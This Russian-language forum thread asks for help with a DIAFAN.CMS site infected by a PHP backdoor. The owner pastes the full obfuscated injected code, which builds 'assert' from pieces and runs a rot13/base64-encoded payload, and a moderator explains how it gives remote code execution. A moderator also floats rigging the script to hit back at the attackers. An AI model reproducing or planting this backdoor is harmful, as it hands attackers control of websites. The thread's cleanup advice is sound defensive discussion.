Ошибка сохранения страниц

- Дмитрий (DarkMilkMan)
- 6
08 декабря 2015 г.
Всем добрый день.

Вчера были проблемы с хостингом как мне казалось, страницы сайта грузились очень долго, либо загружались с поломанной вёрсткой и ошибкой 500 на пол экрана.

Через несколько часов всё само собой улеглось. И при работе с сайтом заметил что когда я сохраняю страницу товара например, страница не перезагружается и не выводит на страницу с каталогом. Показывает лишь белую страницу.

Ссылка превращается из такой: /admin/shop/site23/edit2942/
В такую: /admin/shop/site23/save2942/

Подскажите в чём может быть проблема?
- Виталий NVGPRO (DIAFAN.CMS)
  354
- 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
- Вариантов много. Полагаю, если с хостом все ОК, то надо начать с проверки целостности таблиц базы данных, затем инициируйте процедуру оптимизации таблиц базы данных.
- Дмитрий (DarkMilkMan)
  6
  
  08 декабря 2015 г.
  
  Дождался ответа от тех поддержки хостинга, сказали что вирус и выглядит он вот так.
  Как от него избавится?
  
  Виталий NVGPRO (DIAFAN.CMS)
  354
  
  08 декабря 2015 г. , редакция: 08 декабря 2015 г.
  
  Очень похоже на PHP-Backdoor.
  Cпособ интересный - обычная обфускация - и описан еще в 2008. Им пользуются давно и это, наверное, самый распространённый тип бэкдора на сегодняшний день.
  Т.е. обратившись к вашему сайту можно передать на исполнение сторонний скрипт. Например, удалить все файлы, вывести на экран config.php и т.п.
  Ваша картинка отображает только часть кода. Необходим весь скрипт.
  Теперь Вам надо либо чистить все в ручную или перезалить не испорченные файлы и базу. Затем выяснить как данный скрипт к Вам попал и закрыть брешь (cms.diafan не позволит так просто внедрить данный скрипт, поэтому возможно это косяк либо админов хоста, либо Ваша невнимательность при использовании сторонних скриптов).
  
  Дмитрий (DarkMilkMan)
  6
  
  08 декабря 2015 г.
  
  Вот весь код
  
  //###==###
  error_reporting(0);
  $strings = "as";$strings .= "sert";
  @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcMTyyXPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFx7nJLbVJymp2I0XPEwK1fvFSEHHS9OD0ASHSEsD0uOHyASIPWqXFy7nJLbpUWyM19gLKEwnPtvVF4uqFVfMzyfMI9aMKEsL29hqTIhqUZbWS9GEIWJEIWoVyAQHxyDIS9TFHkSGxSAEFWqXFxcrlEwZQ0vIIETYGtvB31yoUAyrlEwZQ0vq2yhMT93pl0kZwHkVwg9sJIfp2I7WTZjCFEwK1fvFSEHHS9OD0ASHSEsD0uOHyASIPWqB31cMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXKfxLmR9L3IloS9cozy0XPWbqUEjBv8ip3IjMKWcozEyrTS0o3VhpaHiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwD3MzMxL2VjBJSvLJWyZwWzMQtlZ2AvBJD1MQyyATL2Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB2A1pzksp2I0o3O0XPEwZFj0ZvkzLJkmMFx7L3IloS9mMKEipUDbWTZkYQR5BGRmYUElqJHcBlEcLaLtCFNtL3IloS9yrTIwXPEwZFx7L3IloS9woT9mMFtxLmRcB31yoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvx9CGRcrlEcLaLtCFOznJkyK2qyqS9wo250MJ50pltvnUE0pQbiY3A1pTIlnJ5xMKuuqT9lYaW1Y2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMwCFVhWTZjYvVznG0kWzyjCFVhWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0hVvMbCFVhoJD1XPV0A2MzMTAvZQyuLzSvMGVlMzD4ZwAwLwyxAJD5MGEzAvVhWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0hWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqYvEwZP4vZFVcXGg9VTyzVPucp3AyqPtxnJW2XFxtrlOyL2uiVPEcLaL7VU0tnJLbnKAmMKDbWS9FEISIEIAHJlWjVy0cVPLzVPEsHxIEIHIGISfvpPWqVQ09VPWvMTMuMwV2BPVcVUftDTSmp2IlqPtxK1WSHIISH1EoVzZvKFx7VU19"));'));
  //###==###
  
  Александр Биг Эпл (ba5)
  83
  
  08 декабря 2015 г.
  
  Можно скачать папку custom, затем ее удалить.
  
  Нажать в в Темах - Сгенерировать тему и он сам покажет исправленные файлы.
  
  Виталий NVGPRO (DIAFAN.CMS)
  354
  
  08 декабря 2015 г. , редакция: 08 декабря 2015 г.
  
  Интересная модификация.
  Проверьте .htaccess , index.php , index.html , а так же смотрите добавляемые левые папки со всяким бредом...
  А также
  Цитата
  Вам надо либо чистить все в ручную или перезалить не испорченные файлы и базу. Затем выяснить как данный скрипт к Вам попал и закрыть брешь (cms.diafan не позволит так просто внедрить данный скрипт, поэтому возможно это косяк либо админов хоста, либо Ваша невнимательность при использовании сторонних скриптов).
  
  Желательно для Вас это сделать оперативно. Пока более не могу добавить, т.к. загружен своими вопросами, если будет необходимо отвечу немного позже. Возможно другие участники форума, что-то подскажут.
  Не совсем согласен с Александр Биг Эпл (ba5), т.к. данный код позволяет корректировать и кастомизированные файлы (впрочем как и все остальное), но как вариант не плохой.
  
  Виталий NVGPRO (DIAFAN.CMS)
  354
  
  08 декабря 2015 г.
  
  Все же интересная тема, лично я бы не спешил. Вычистил бы все вручную, модифицировал данный скрипт с отдачей в ответ сюрприза, поставил бы отдельное логирование на такое обращение к сайту, затем постарался бы определить от куда идут обращения. В общем все зависит от фантазии.
  
  Александр Биг Эпл (ba5)
  83
  
  08 декабря 2015 г.
  
  Если какие-то системные файлы были изменены, метод их покажет
  
  Дмитрий (DarkMilkMan)
  6
  
  08 декабря 2015 г.
  
  Всё вроде проблему решил антивирусом.

- Виталий NVGPRO (DIAFAN.CMS)
- 354
08 декабря 2015 г. , редакция: 08 декабря 2015 г.
Цитата
Если какие-то системные файлы были изменены, метод их покажет

Александр Биг Эпл (ba5), например метод не сможет показать, что изменился .htaccess, index.php, init.php и т.д., или созданы дополнительные папки и файлы, к которым возможно обратиться напрямую (минуя обработчик cms)

Новости

Блоги

Блоги

Форум